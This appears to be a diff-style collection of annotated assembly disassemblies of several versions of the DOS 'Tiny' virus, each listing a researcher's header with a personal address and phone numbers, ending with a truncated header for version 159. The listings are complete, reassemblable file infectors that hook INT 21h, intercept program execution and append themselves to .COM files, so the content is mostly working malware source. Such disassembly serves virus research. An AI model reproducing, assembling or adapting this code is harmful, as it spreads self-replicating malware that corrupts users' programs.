; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
|
||||
; º Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51 º
|
||||
; º Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 º
|
||||
; º º
|
||||
; º The 'Tiny' Virus, version TINY-138 º
|
||||
; º Disassembled by Vesselin Bontchev, September 1990 º
|
||||
; º º
|
||||
; º Copyright (c) Vesselin Bontchev 1989, 1990 º
|
||||
; º º
|
||||
; º This listing is only to be made available to virus researchers º
|
||||
; º or software writers on a need-to-know basis. º
|
||||
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
|
||||
|
||||
; The disassembly has been tested by re-assembly using MASM 5.0.
|
||||
|
||||
code segment
|
||||
assume cs:code, ds:code
|
||||
|
||||
org 100
|
||||
|
||||
seg_60 equ 600
|
||||
v_len equ v_end-first4
|
||||
|
||||
start:
|
||||
jmp v_entry ; Jump to virus code
|
||||
db 'M' ; Virus signature
|
||||
mov ax,4C00 ; Program terminate
|
||||
int 21
|
||||
|
||||
; The original first 4 bytes of the infected file:
|
||||
|
||||
first4 db 0EBh, 2, 90, 90
|
||||
|
||||
v_entry:
|
||||
mov si,0FF ; Initialize some registers
|
||||
mov di,offset start ; Put the addres of program start in DI
|
||||
mov bx,int_21-first4+seg_60 ; Point BX at new INT 13h handler
|
||||
|
||||
; The virus will be installed in memory at
|
||||
; address 0050:0100h (i.e., at segment 60h):
|
||||
|
||||
mov cx,50
|
||||
|
||||
add si,[si+2] ; Determine the start addres of the virus body
|
||||
|
||||
push di ; Now a Near RET instruction will run the prg.
|
||||
|
||||
movsw ; Restore the original first 4 bytes
|
||||
movsw
|
||||
|
||||
mov es,cx ; Point ES:DI at 0050:0100h
|
||||
cmpsb ; Check if the virus is present in memory
|
||||
jz run ; Just run the program if so
|
||||
|
||||
; Virus not in memory. Install it there:
|
||||
|
||||
dec si ; Correct SI & DI to point at the start of
|
||||
dec di ; virus code and to destination address
|
||||
rep movsw ; Move the virus there
|
||||
|
||||
mov es,cx ; ES := 0
|
||||
|
||||
; Move the INT 21h handler to INT 32h and
|
||||
; install int_21 as new INT 21h handler.
|
||||
; By the way, now DI == 1A4h (i.e., 69h*4):
|
||||
|
||||
xchg ax,bx ; Thransfer INT 21h vector to INT 69h,
|
||||
xchg ax,cx ; preserving AX
|
||||
lp:
|
||||
xchg ax,cx ; Get a word
|
||||
xchg ax,es:[di-(69-21)*4] ; Swap the two words
|
||||
stosw ; Save the word
|
||||
jcxz lp ; Loop until done (two times)
|
||||
|
||||
xchg ax,bx ; Restore AX (to keep progs as DISKCOPY happy)
|
||||
|
||||
run:
|
||||
push ds ; Restore ES
|
||||
pop es
|
||||
ret ; And exit (go to CS:100h)
|
||||
|
||||
int_21: ; New INT 21h handler
|
||||
cmp ax,4B00 ; EXEC function call?
|
||||
jne end_21 ; Exit if not
|
||||
|
||||
push ax ; Save registers used
|
||||
push bx
|
||||
push dx
|
||||
push ds
|
||||
push es
|
||||
|
||||
mov ax,3D02 ; Open the file for both reading and writting
|
||||
call do_int21
|
||||
jc end_exec ; Exit on error
|
||||
|
||||
cbw ; Zero AH
|
||||
cwd ; Zero DX
|
||||
mov bx,si ; Save handle in BX
|
||||
mov ds,ax ; Set DS and ES to 60h,
|
||||
mov es,ax ; the virus data segment
|
||||
|
||||
mov ah,3F ; Read the first 4 bytes
|
||||
int 69
|
||||
|
||||
; Check whether the file is already infected or is an .EXE file.
|
||||
; The former contains the character `M' in its 3rd byte and
|
||||
; the latter contains it either in the 0th or in the 1st byte.
|
||||
|
||||
mov al,'M' ; Look for `M'
|
||||
repne scasb
|
||||
jz close ; Exit if file not suitable for infection
|
||||
|
||||
mov al,2 ; Seek to the end of file
|
||||
call lseek ; SI now contains the file size
|
||||
|
||||
mov cl,v_len ; Length of virus body
|
||||
int 69 ; Append the virus to the file (AH is now 40h)
|
||||
|
||||
mov al,0E9 ; Near JMP opcode
|
||||
stosb ; Form the first instruction of the file
|
||||
inc si ; Add 1 to file size for the JMP
|
||||
xchg ax,si ; Move it in AX
|
||||
stosw ; Form the JMP's opperand
|
||||
mov al,'M' ; Add a `M' character to mark the file
|
||||
stosb ; as infected
|
||||
|
||||
xchg ax,dx ; Zero AX
|
||||
call lseek ; Seek to the beginning
|
||||
int 69 ; AH is 40h, write the JMP instruction
|
||||
|
||||
close:
|
||||
mov ah,3E ; Close the file
|
||||
int 69
|
||||
|
||||
end_exec:
|
||||
pop es ; Restore used registers
|
||||
pop ds
|
||||
pop dx
|
||||
pop bx
|
||||
pop ax
|
||||
|
||||
; Exit through the original INT 21h handler:
|
||||
|
||||
end_21:
|
||||
jmp dword ptr cs:[69*4]
|
||||
|
||||
lseek:
|
||||
mov ah,42 ; Seek operation
|
||||
cwd ; Zero DX
|
||||
do_int21:
|
||||
xor cx,cx ; External entry for Open
|
||||
int 69
|
||||
mov cl,4 ; 4 bytes will be read/written
|
||||
xchg ax,si ; Store AX in SI
|
||||
mov ax,4060 ; Prepare AH for Write
|
||||
xor di,di ; Zero DI
|
||||
ret ; Done
|
||||
|
||||
v_end equ $ ; End of virus body
|
||||
|
||||
code ends
|
||||
end start
|
||||
|
|
@ -0,0 +1,174 @@
|
|||
page ,132
|
||||
name TINY143
|
||||
title The 'Tiny' virus, version TINY-143
|
||||
.radix 16
|
||||
|
||||
; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
|
||||
; º Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51 º
|
||||
; º Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 º
|
||||
; º º
|
||||
; º The 'Tiny' Virus, version TINY-143 º
|
||||
; º Disassembled by Vesselin Bontchev, August 1990 º
|
||||
; º º
|
||||
; º Copyright (c) Vesselin Bontchev 1989, 1990 º
|
||||
; º º
|
||||
; º This listing is only to be made available to virus researchers º
|
||||
; º or software writers on a need-to-know basis. º
|
||||
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
|
||||
|
||||
; The disassembly has been tested by re-assembly using MASM 5.0.
|
||||
|
||||
code segment
|
||||
assume cs:code, ds:code
|
||||
|
||||
org 100
|
||||
|
||||
seg_60 equ 600
|
||||
v_len equ v_end-first4
|
||||
|
||||
start:
|
||||
jmp v_entry ; Jump to virus code
|
||||
db 'M' ; Virus signature
|
||||
mov ax,4C00 ; Program terminate
|
||||
int 21
|
||||
|
||||
; The original first 4 bytes of the infected file:
|
||||
|
||||
first4 db 0EBh, 2, 90, 90
|
||||
|
||||
v_entry:
|
||||
mov si,0FF ; Initialize some registers
|
||||
mov di,offset start ; Put the addres of program start in DI
|
||||
mov bx,int_21-first4+seg_60 ; Point BX at new INT 13h handler
|
||||
|
||||
; The virus will be installed in memory at
|
||||
; address 0050:0100h (i.e., at segment 60h):
|
||||
|
||||
mov cx,50
|
||||
|
||||
add si,[si+2] ; Determine the start addres of the virus body
|
||||
|
||||
push di ; Now a Near RET instruction will run the prg.
|
||||
|
||||
movsw ; Restore the original first 4 bytes
|
||||
movsw
|
||||
|
||||
mov es,cx ; Point ES:DI at 0050:0100h
|
||||
cmpsb ; Check if the virus is present in memory
|
||||
jz run ; Just run the program if so
|
||||
|
||||
; Virus not in memory. Install it there:
|
||||
|
||||
dec si ; Correct SI & DI to point at the start of
|
||||
dec di ; virus code and to destination address
|
||||
rep movsw ; Move the virus there
|
||||
|
||||
mov es,cx ; ES := 0
|
||||
|
||||
; Move the INT 21h handler to INT 32h and
|
||||
; install int_21 as new INT 21h handler.
|
||||
; By the way, now DI == 1A4h (i.e., 69h*4):
|
||||
|
||||
xchg ax,bx ; Thransfer INT 21h vector to INT 69h,
|
||||
xchg ax,cx ; preserving AX
|
||||
lp:
|
||||
xchg ax,cx ; Get a word
|
||||
xchg ax,es:[di-(69-21)*4] ; Swap the two words
|
||||
stosw ; Save the word
|
||||
jcxz lp ; Loop until done (two times)
|
||||
|
||||
xchg ax,bx ; Restore AX (to keep progs as DISKCOPY happy)
|
||||
|
||||
run:
|
||||
push ds ; Restore ES
|
||||
pop es
|
||||
ret ; And exit (go to CS:100h)
|
||||
|
||||
int_21: ; New INT 21h handler
|
||||
cmp ax,4B00 ; EXEC function call?
|
||||
jne end_21 ; Exit if not
|
||||
|
||||
push ax ; Save registers used
|
||||
push bx
|
||||
push dx
|
||||
push ds
|
||||
push es
|
||||
|
||||
mov ax,3D02 ; Open the file for both reading and writting
|
||||
int 69
|
||||
jc end_exec ; Exit on error
|
||||
xchg ax,bx ; Save the file handle in BX
|
||||
|
||||
call lseek1 ; Lseek to file beginning (and set CL to 4)
|
||||
|
||||
mov al,seg_60 shr 4 ; Read the first 4 bytes of the file
|
||||
mov ds,ax ; Set buffer offset to 0060:0000h
|
||||
mov es,ax ; Point ES there too
|
||||
mov ah,3F
|
||||
int 69 ; Do read
|
||||
|
||||
; Check whether the file is already infected or is an .EXE file.
|
||||
; The former contains the character `M' in its 3rd byte and
|
||||
; the latter contains it either in the 0th or in the 1st byte.
|
||||
|
||||
xor di,di
|
||||
mov al,'M' ; Look for `M'
|
||||
repne scasb
|
||||
jz close ; Exit if file not suitable for infection
|
||||
|
||||
mov al,2 ; Seek to the end of file (and put 4 in CL)
|
||||
call lseek
|
||||
|
||||
push ax ; Save file length
|
||||
|
||||
mov cl,v_len ; Length of virus body
|
||||
mov ah,40 ; Append the virus to the file
|
||||
int 69 ; Do it
|
||||
|
||||
call lseek1 ; Seek to the file beginning
|
||||
|
||||
xchg ax,di ; Point DX at first4
|
||||
mov al,0E9 ; Near JMP opcode
|
||||
stosb ; Form the first instruction of the file
|
||||
pop ax ; Restore file length in AX
|
||||
inc ax
|
||||
stosw ; Form the JMP's opperand
|
||||
mov al,'M' ; Add a `M' character to mark the file
|
||||
stosb ; as infected
|
||||
|
||||
mov ah,40 ; Overwrite the first 4 bytes of the file
|
||||
int 69 ; Do it
|
||||
|
||||
close:
|
||||
mov ah,3E ; Close the file
|
||||
int 69
|
||||
|
||||
end_exec:
|
||||
pop es ; Restore used registers
|
||||
pop ds
|
||||
pop dx
|
||||
pop bx
|
||||
pop ax
|
||||
|
||||
; Exit through the original INT 21h handler:
|
||||
|
||||
end_21:
|
||||
jmp dword ptr cs:[69*4]
|
||||
|
||||
lseek1:
|
||||
mov al,0 ; Lseek to the file beginning
|
||||
|
||||
lseek:
|
||||
mov ah,42 ; Lseek either to file beginning or to file end
|
||||
xor cx,cx
|
||||
xor dx,dx
|
||||
int 69 ; Do it
|
||||
|
||||
mov cl,4 ; Put 4 in CL
|
||||
ret ; Done
|
||||
|
||||
v_end equ $ ; End of virus body
|
||||
|
||||
code ends
|
||||
end start
|
||||
|
|
@ -0,0 +1,182 @@
|
|||
page ,132
|
||||
name TINY154
|
||||
title The 'Tiny' virus, version TINY-154
|
||||
.radix 16
|
||||
|
||||
; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
|
||||
; º Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51 º
|
||||
; º Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 º
|
||||
; º º
|
||||
; º The 'Tiny' Virus, version TINY-154 º
|
||||
; º Disassembled by Vesselin Bontchev, September 1990 º
|
||||
; º º
|
||||
; º Copyright (c) Vesselin Bontchev 1989, 1990 º
|
||||
; º º
|
||||
; º This listing is only to be made available to virus researchers º
|
||||
; º or software writers on a need-to-know basis. º
|
||||
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
|
||||
|
||||
; The disassembly has been tested by re-assembly using MASM 5.0.
|
||||
|
||||
code segment
|
||||
assume cs:code, ds:code
|
||||
|
||||
org 100
|
||||
|
||||
seg_60 equ 600
|
||||
v_len equ v_end-first4
|
||||
|
||||
start:
|
||||
jmp v_entry ; Jump to virus code
|
||||
db 'M' ; Virus signature
|
||||
mov ax,4C00 ; Program terminate
|
||||
int 21
|
||||
|
||||
; The original first 4 bytes of the infected file:
|
||||
|
||||
first4 db 0EBh, 2, 90, 90
|
||||
|
||||
v_entry:
|
||||
mov si,0FF ; Determine the start addres of the virus body
|
||||
add si,[si+2]
|
||||
|
||||
mov di,offset start ; Put the addres of program start on the stack
|
||||
push di ; Now a Near RET instruction will jump there
|
||||
|
||||
push ax ; Save AX (to keep programs as DISKCOPY happy)
|
||||
|
||||
movsw ; Restore the original first 4 bytes
|
||||
movsw
|
||||
|
||||
mov di,seg_60+4 ; Point ES:DI at 0000:0604h (i.e, segment 60h)
|
||||
xor cx,cx ; ES := 0
|
||||
mov es,cx
|
||||
mov cl,v_len-2 ; CX := virus length
|
||||
lodsw ; Check if virus is present in memory
|
||||
scasw
|
||||
je run ; Just run the program if so
|
||||
|
||||
; Virus not in memory. Install it there:
|
||||
|
||||
dec di ; Adjust DI
|
||||
dec di
|
||||
stosw ; Store the first word of the virus body
|
||||
rep movsb ; Store the rest of the virus
|
||||
|
||||
mov di,32*4 ; Old INT 21h handler will be moved to INT 32h
|
||||
mov ax,int_21-first4+seg_60
|
||||
|
||||
; Move the INT 21h handler to INT 32h and
|
||||
; install int_21 as new INT 21h handler:
|
||||
|
||||
xchg ax,cx
|
||||
vect_cpy:
|
||||
xchg ax,cx
|
||||
xchg ax,word ptr es:[di-(32-21)*4]
|
||||
stosw
|
||||
jcxz vect_cpy ; Loop until done
|
||||
|
||||
run:
|
||||
pop ax ; Restore AX
|
||||
push ds ; ES := DS
|
||||
pop es
|
||||
|
||||
; Jump to program start via funny RET instruction:
|
||||
|
||||
ret
|
||||
|
||||
int_21: ; New INT 21h handler
|
||||
cmp ax,4B00 ; EXEC function call?
|
||||
jne end_21 ; Exit if not
|
||||
|
||||
push ax ; Save registers used
|
||||
push bx
|
||||
push cx
|
||||
push dx
|
||||
push di
|
||||
push ds
|
||||
push es
|
||||
|
||||
push cs ; ES := CS
|
||||
pop es
|
||||
|
||||
mov ax,3D02 ; Open the file for both reading and writting
|
||||
int 32
|
||||
jc end_exec ; Exit on error
|
||||
xchg ax,bx ; Save the file handle in BX
|
||||
|
||||
call lseek1
|
||||
|
||||
mov ah,3F ; Read the first 4 bytes of the file
|
||||
mov di,dx ; Save first4 address in DI
|
||||
push cs ; DS := CS
|
||||
pop ds
|
||||
int 32 ; Do it
|
||||
|
||||
; Check whether the file is already infected or is an .EXE file.
|
||||
; The former contains the character `M' in its 3rd byte and
|
||||
; the latter contains it either in the 0th or in the 1st byte.
|
||||
|
||||
push di ; Save DI
|
||||
mov al,'M' ; Look for `M'
|
||||
repne scasb
|
||||
pop di ; Restore DI
|
||||
je close ; Exit if file not suitable for infection
|
||||
|
||||
mov al,2 ; Seek to the end of file
|
||||
call lseek
|
||||
|
||||
push ax ; Save file length
|
||||
|
||||
mov cl,v_len ; Length of virus body
|
||||
mov ah,40 ; Append virus to file
|
||||
int 32 ; Do it
|
||||
|
||||
call lseek1 ; Seek to the file beginning
|
||||
|
||||
mov al,0E9 ; Near JMP opcode
|
||||
stosb ; Form the first instruction of the file
|
||||
pop ax ; Restore file length in AX
|
||||
inc ax
|
||||
stosw ; Form the JMP's opperand
|
||||
mov al,'M' ; Add a `M' character to mark the file
|
||||
stosb ; as infected
|
||||
|
||||
mov ah,40
|
||||
int 32 ; Do it
|
||||
|
||||
close:
|
||||
mov ah,3E ; Close the file
|
||||
int 32
|
||||
|
||||
end_exec:
|
||||
pop es ; Restore used registers
|
||||
pop ds
|
||||
pop di
|
||||
pop dx
|
||||
pop cx
|
||||
pop bx
|
||||
pop ax
|
||||
|
||||
; Exit through the original INT 21h handler:
|
||||
|
||||
end_21:
|
||||
jmp dword ptr cs:[32*4]
|
||||
|
||||
lseek1:
|
||||
mov al,0 ; Lseek to file beginning
|
||||
lseek:
|
||||
mov ah,42 ; Lseek either to file beginning or to file end
|
||||
xor cx,cx
|
||||
xor dx,dx
|
||||
int 32 ; Do it
|
||||
|
||||
mov dh,6 ; Put 6 in DH and 4 in CL
|
||||
mov cl,4
|
||||
ret ; Done
|
||||
|
||||
v_end equ $ ; End of virus body
|
||||
|
||||
code ends
|
||||
end start
|
||||
|
|
@ -0,0 +1,182 @@
|
|||
page ,132
|
||||
name TINY156
|
||||
title The 'Tiny' virus, version TINY-156
|
||||
.radix 16
|
||||
|
||||
; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
|
||||
; º Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51 º
|
||||
; º Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 º
|
||||
; º º
|
||||
; º The 'Tiny' Virus, version TINY-156 º
|
||||
; º Disassembled by Vesselin Bontchev, September 1990 º
|
||||
; º º
|
||||
; º Copyright (c) Vesselin Bontchev 1989, 1990 º
|
||||
; º º
|
||||
; º This listing is only to be made available to virus researchers º
|
||||
; º or software writers on a need-to-know basis. º
|
||||
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
|
||||
|
||||
; The disassembly has been tested by re-assembly using MASM 5.0.
|
||||
|
||||
code segment
|
||||
assume cs:code, ds:code
|
||||
|
||||
org 100
|
||||
|
||||
seg_60 equ 600
|
||||
v_len equ v_end-first4
|
||||
|
||||
start:
|
||||
jmp v_entry ; Jump to virus code
|
||||
db 'M' ; Virus signature
|
||||
mov ax,4C00 ; Program terminate
|
||||
int 21
|
||||
|
||||
; The original first 4 bytes of the infected file:
|
||||
|
||||
first4 db 0EBh, 2, 90, 90
|
||||
|
||||
v_entry:
|
||||
mov si,0FF ; Determine the start addres of the virus body
|
||||
add si,[si+2]
|
||||
|
||||
mov di,offset start ; Put the addres of program start on the stack
|
||||
push di ; Now a Near RET instruction will jump there
|
||||
|
||||
push ax ; Save AX (to keep programs as DISKCOPY happy)
|
||||
|
||||
movsw ; Restore the original first 4 bytes
|
||||
movsw
|
||||
|
||||
mov di,seg_60+4 ; Point ES:DI at 0000:0604h (i.e, segment 60h)
|
||||
xor cx,cx ; ES := 0
|
||||
mov es,cx
|
||||
mov cl,v_len-2 ; CX := virus length
|
||||
lodsw ; Check if virus is present in memory
|
||||
scasw
|
||||
je run ; Just run the program if so
|
||||
|
||||
; Virus not in memory. Install it there:
|
||||
|
||||
dec di ; Adjust DI
|
||||
dec di
|
||||
stosw ; Store the first word of the virus body
|
||||
rep movsb ; Store the rest of the virus
|
||||
|
||||
mov di,32*4 ; Old INT 21h handler will be moved to INT 32h
|
||||
mov ax,int_21-first4+seg_60
|
||||
|
||||
; Move the INT 21h handler to INT 32h and
|
||||
; install int_21 as new INT 21h handler:
|
||||
|
||||
xchg ax,cx
|
||||
vect_cpy:
|
||||
xchg ax,cx
|
||||
xchg ax,word ptr es:[di-(32-21)*4]
|
||||
stosw
|
||||
jcxz vect_cpy ; Loop until done
|
||||
|
||||
run:
|
||||
pop ax ; Restore AX
|
||||
push ds ; ES := DS
|
||||
pop es
|
||||
|
||||
; Jump to program start via funny RET instruction:
|
||||
|
||||
ret
|
||||
|
||||
int_21: ; New INT 21h handler
|
||||
cmp ax,4B00 ; EXEC function call?
|
||||
jne end_21 ; Exit if not
|
||||
|
||||
push ax ; Save registers used
|
||||
push bx
|
||||
push cx
|
||||
push dx
|
||||
push di
|
||||
push ds
|
||||
push es
|
||||
|
||||
push cs ; ES := CS
|
||||
pop es
|
||||
|
||||
mov ax,3D02 ; Open the file for both reading and writting
|
||||
int 32
|
||||
jc end_exec ; Exit on error
|
||||
xchg ax,bx ; Save the file handle in BX
|
||||
|
||||
mov al,0
|
||||
call lseek
|
||||
|
||||
mov ah,3F ; Read the first 4 bytes of the file
|
||||
mov di,dx ; Save first4 address in DI
|
||||
push cs ; DS := CS
|
||||
pop ds
|
||||
int 32 ; Do it
|
||||
|
||||
; Check whether the file is already infected or is an .EXE file.
|
||||
; The former contains the character `M' in its 3rd byte and
|
||||
; the latter contains it either in the 0th or in the 1st byte.
|
||||
|
||||
push di ; Save DI
|
||||
mov al,'M' ; Look for `M'
|
||||
repne scasb
|
||||
pop di ; Restore DI
|
||||
je close ; Exit if file not suitable for infection
|
||||
|
||||
mov al,2 ; Seek to the end of file
|
||||
call lseek
|
||||
|
||||
push ax ; Save file length
|
||||
|
||||
mov cl,v_len ; Length of virus body
|
||||
mov ah,40 ; Append virus to file
|
||||
int 32 ; Do it
|
||||
|
||||
mov al,0 ; Seek to the file beginning
|
||||
call lseek
|
||||
|
||||
mov al,0E9 ; Near JMP opcode
|
||||
stosb ; Form the first instruction of the file
|
||||
pop ax ; Restore file length in AX
|
||||
inc ax
|
||||
stosw ; Form the JMP's opperand
|
||||
mov al,'M' ; Add a `M' character to mark the file
|
||||
stosb ; as infected
|
||||
|
||||
mov ah,40
|
||||
int 32 ; Do it
|
||||
|
||||
close:
|
||||
mov ah,3E ; Close the file
|
||||
int 32
|
||||
|
||||
end_exec:
|
||||
pop es ; Restore used registers
|
||||
pop ds
|
||||
pop di
|
||||
pop dx
|
||||
pop cx
|
||||
pop bx
|
||||
pop ax
|
||||
|
||||
; Exit through the original INT 21h handler:
|
||||
|
||||
end_21:
|
||||
jmp dword ptr cs:[32*4]
|
||||
|
||||
lseek:
|
||||
mov ah,42 ; Lseek either to file beginning or to file end
|
||||
xor cx,cx
|
||||
xor dx,dx
|
||||
int 32 ; Do it
|
||||
|
||||
mov dh,6 ; Put 6 in DH and 4 in CL
|
||||
mov cl,4
|
||||
ret ; Done
|
||||
|
||||
v_end equ $ ; End of virus body
|
||||
|
||||
code ends
|
||||
end start
|
||||
|
|
@ -0,0 +1,178 @@
|
|||
page ,132
|
||||
name TINY158
|
||||
title The 'Tiny' virus, version TINY-158
|
||||
.radix 16
|
||||
|
||||
; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
|
||||
; º Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51 º
|
||||
; º Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 º
|
||||
; º º
|
||||
; º The 'Tiny' Virus, version TINY-158 º
|
||||
; º Disassembled by Vesselin Bontchev, July 1990 º
|
||||
; º º
|
||||
; º Copyright (c) Vesselin Bontchev 1989, 1990 º
|
||||
; º º
|
||||
; º This listing is only to be made available to virus researchers º
|
||||
; º or software writers on a need-to-know basis. º
|
||||
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
|
||||
|
||||
; The disassembly has been tested by re-assembly using MASM 5.0.
|
||||
|
||||
code segment
|
||||
assume cs:code, ds:code
|
||||
|
||||
org 100
|
||||
|
||||
seg_60 equ 600
|
||||
v_len equ v_end-first4
|
||||
|
||||
start:
|
||||
jmp v_entry ; Jump to virus code
|
||||
db 'M' ; Virus signature
|
||||
mov ax,4C00 ; Program terminate
|
||||
int 21
|
||||
|
||||
; The original first 4 bytes of the infected file:
|
||||
|
||||
first4 db 0EBh, 2, 90, 90
|
||||
|
||||
v_entry:
|
||||
mov si,0FF ; Determine the start addres of the virus body
|
||||
add si,[si+2]
|
||||
|
||||
mov di,offset start ; Put the addres of program start on the stack
|
||||
push di ; Now a Near RET instruction will jump there
|
||||
|
||||
push ax ; Save AX (to keep programs as DISKCOPY happy)
|
||||
|
||||
movsw ; Restore the original first 4 bytes
|
||||
movsw
|
||||
|
||||
mov di,seg_60+4 ; Point ES:DI at 0000:0604h (i.e, segment 60h)
|
||||
xor cx,cx ; ES := 0
|
||||
mov es,cx
|
||||
mov cl,v_len-2 ; CX := virus length
|
||||
lodsw ; Check if virus is present in memory
|
||||
scasw
|
||||
je run ; Just run the program if so
|
||||
|
||||
; Virus not in memory. Install it there:
|
||||
|
||||
dec di ; Adjust DI
|
||||
dec di
|
||||
stosw ; Store the first word of the virus body
|
||||
rep movsb ; Store the rest of the virus
|
||||
|
||||
mov di,32*4 ; Old INT 21h handler will be moved to INT 32h
|
||||
mov ax,int_21-first4+seg_60
|
||||
|
||||
; Move the INT 21h handler to INT 32h and
|
||||
; install int_21 as new INT 21h handler:
|
||||
|
||||
xchg ax,cx
|
||||
vect_cpy:
|
||||
xchg ax,cx
|
||||
xchg ax,word ptr es:[di-(32-21)*4]
|
||||
stosw
|
||||
jcxz vect_cpy ; Loop until done
|
||||
|
||||
run:
|
||||
pop ax ; Restore AX
|
||||
push ds ; ES := DS
|
||||
pop es
|
||||
|
||||
; Jump to program start via funny RET instruction:
|
||||
|
||||
ret
|
||||
|
||||
int_21: ; New INT 21h handler
|
||||
cmp ax,4B00 ; EXEC function call?
|
||||
jne end_21 ; Exit if not
|
||||
|
||||
push ax ; Save registers used
|
||||
push bx
|
||||
push cx
|
||||
push dx
|
||||
push di
|
||||
push ds
|
||||
push es
|
||||
|
||||
push cs ; ES := CS
|
||||
pop es
|
||||
|
||||
mov ax,3D02 ; Open the file for both reading and writting
|
||||
int 32
|
||||
jc end_exec ; Exit on error
|
||||
xchg bx,ax ; Save the file handle in BX
|
||||
|
||||
mov ah,3F ; Read the first 4 bytes of the file
|
||||
mov cx,4 ; 4 bytes to read
|
||||
mov dx,seg_60 ; Put them in first4
|
||||
mov di,dx ; Save first4 address in DI
|
||||
push cs ; DS := CS
|
||||
pop ds
|
||||
int 32 ; Do it
|
||||
|
||||
; Check whether the file is already infected or is an .EXE file.
|
||||
; The former contains the character `M' in its 3rd byte and
|
||||
; the latter contains it either in the 0th or in the 1st byte.
|
||||
|
||||
push di ; Save DI
|
||||
mov al,'M' ; Look for `M'
|
||||
repne scasb
|
||||
pop di ; Restore DI
|
||||
je close ; Exit if file not suitable for infection
|
||||
|
||||
mov ax,4202 ; Seek to the end of file
|
||||
xor cx,cx
|
||||
xor dx,dx
|
||||
int 32 ; Do it
|
||||
|
||||
push ax ; Save file length
|
||||
|
||||
mov dh,6 ; DX = 600h, i.e. point it at 0000:0600h
|
||||
mov cl,v_len ; Length of virus body
|
||||
mov ah,40 ; Append virus to file
|
||||
int 32 ; Do it
|
||||
|
||||
mov ax,4200 ; Seek to the file beginning
|
||||
xor cx,cx
|
||||
xor dx,dx
|
||||
int 32 ; Do it
|
||||
|
||||
mov dx,di ; Point DX at first4
|
||||
mov al,0E9 ; Near JMP opcode
|
||||
stosb ; Form the first instruction of the file
|
||||
pop ax ; Restore file length in AX
|
||||
inc ax
|
||||
stosw ; Form the JMP's opperand
|
||||
mov al,'M' ; Add a `M' character to mark the file
|
||||
stosb ; as infected
|
||||
|
||||
mov cl,4 ; Overwrite the first 4 bytes of the file
|
||||
mov ah,40
|
||||
int 32 ; Do it
|
||||
|
||||
close:
|
||||
mov ah,3E ; Close the file
|
||||
int 32
|
||||
|
||||
end_exec:
|
||||
pop es ; Restore used registers
|
||||
pop ds
|
||||
pop di
|
||||
pop dx
|
||||
pop cx
|
||||
pop bx
|
||||
pop ax
|
||||
|
||||
; Exit through the original INT 21h handler:
|
||||
|
||||
end_21:
|
||||
jmp dword ptr cs:[32*4]
|
||||
|
||||
v_end equ $ ; End of virus body
|
||||
|
||||
code ends
|
||||
end start
|
||||
|
|
@ -0,0 +1,178 @@
|
|||
page ,132
|
||||
name TINY159
|
||||
title The 'Tiny' virus, version TINY-159
|
||||
.radix 16
|
||||
|
||||
